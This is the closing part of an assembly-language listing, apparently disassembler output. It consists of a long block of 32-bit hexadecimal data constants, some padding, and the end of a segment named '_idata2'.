dd 0CA8A1DE9h, 9E59E4C3h, 61C309C5h, 7C832C6Ch, 0D952A78Ch
dd 0D17E33C4h, 0F292A812h, 2DFF674Eh, 104C02C1h, 685C3D4h
dd 766AEE88h, 0ED520A49h, 0F9B20718h, 0F2DCE724h, 0E502EE68h
dd 24C93460h, 0FA411B43h, 0D91C08DCh, 45491951h, 0B84BC273h
dd 59529344h, 3B615777h, 3CD82EDFh, 0DD97F97Bh, 0C6374D08h
dd 40CEC360h, 39C8C666h, 0E534CFDAh, 759AF888h, 9F61AC3Bh
dd 12A635BBh, 0B8019B16h, 4942E359h, 852EE3B4h, 0D47C4E4Dh
dd 630BD2FFh, 1AD22701h, 65EEDEC1h, 1CAD5C90h, 9D56EBBCh
dd 564A74E3h, 0B5B73DA1h, 535DE620h, 0A2E6BB4Ch, 0FCC5E7DEh
dd 851E2795h, 516A3FF0h, 15E44C68h, 0F63D6E0Fh, 0FB63282Eh
dd 823A8FB9h, 0A50D92AFh, 52826D73h, 0A5870581h, 3980A650h
dd 179FA80Fh, 7960F680h, 0B5166057h, 0F8E0AA6Bh, 0D1CE7B4Ch
dd 38F2877Ch, 4447DB26h, 4A0AFF3h, 0BD363FF3h, 0FDB3D21Fh
dd 15AE6374h, 278E9F40h, 5D6B566Fh, 99E4E7F8h, 914FB633h
dd 0F18A5F50h, 9A36B3Eh, 0AC1571B6h, 754EF7A5h, 815EEFA0h
dd 18EC3DB9h, 0F9F27328h, 31EF16D3h, 11EABF30h, 7643CB9Ch
dd 4B401022h, 37B8215Eh, 6BB3A4F7h, 0A704A92Bh, 0AEF0717Ah
dd 0EE5A21B7h, 0B3C57BF2h, 8B2BA8A4h, 0E9A23731h, 0CE46075Bh
dd 0F4E5509Fh, 6D66C2FEh, 8CB69227h, 706153A4h, 11EA465Eh
dd 8CA1EA3h, 0C48FD728h, 956EDAEEh, 98189A4Dh, 9FD75BACh
dd 0AC2D6752h, 25BE8A12h, 44B24A6Fh, 28A9EBFCh, 0A9220E9Eh
dd 0C0B2D6EBh, 0B4576F60h, 2DA68302h, 40607267h, 7A0813E4h
dd 915F8B65h, 0AB13C81Ch, 9C2D711h, 55EE4BB7h, 0B67CF80h
dd 0C4AB9AADh, 819267CBh, 607F7CF4h, 318A8AD0h, 0DED56BF9h
dd 66D20840h, 0A0CE8615h, 0FC592FA0h, 0ED8C7B1Ch, 0B8949B2Dh
dd 2912F718h, 0F1398AC1h, 4289CF34h, 21872217h, 0EA51984Ah
dd 0DE055DA8h, 0B228BA93h, 0AD049F95h, 0A55B8BD6h, 19EA5F10h
dd 0E2299499h, 6D698E3Dh, 0C083F3B0h, 811AD7EEh, 0CB6E6B47h
dd 0FBB47D99h, 6D88B657h, 5115BF70h, 7D5C0F17h, 1CBD47FAh
dd 0D52E160Ch, 60B28B83h, 32F9C712h, 0DA11D224h, 4ED6F742h
dd 59B5E02Bh, 2269D483h, 9D1AB469h, 0DECE8354h, 413517D1h
dd 7DCEFB8Ch, 7B7207D8h, 0F52653C4h, 0F9AA7F30h, 3DF68B5Fh
dd 0C402F3AAh, 5822C7E0h, 0A1828CEEh, 25E64290h, 19D26738h
dd 15DAE7CFh, 0F01054CDh, 0DD62F851h, 4C5BDFC8h, 37EFBCEBh
dd 6D96F24h, 2CE4BE4Ah, 0FAD9168Ah, 7ED7175h, 13120266h
dd 82h, 4Bh dup(0)
dd 1600h dup(?)
_idata2 ends
end start